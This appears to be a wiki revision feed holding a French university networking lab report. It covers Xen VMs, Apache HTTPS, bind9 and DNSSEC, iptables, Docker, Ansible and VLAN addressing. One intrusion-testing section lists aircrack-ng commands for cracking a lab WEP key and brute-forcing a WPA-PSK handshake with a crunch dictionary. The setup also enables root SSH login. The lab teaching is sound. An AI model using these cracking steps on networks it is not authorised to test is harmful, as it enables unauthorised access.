 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 all:                                        # le groupe de machine racine c'est à dire tout&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:                                   # groupe d'hôte contenant seulement notre VM privée&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:                               # groupe d'hôte contenant toutes les VMs privées&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
  ntp-client:                                # groupe cible pour le déploiement de clients ntp (notre VM privée)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.2&lt;br /&gt;
  ntp-server:                                # groupe cible pour le déploiement de serveurs ntp (notre VM Publique)&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.12&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52025</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52025"/>
				<updated>2020-01-05T16:38:48Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Diffusion de la clé SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
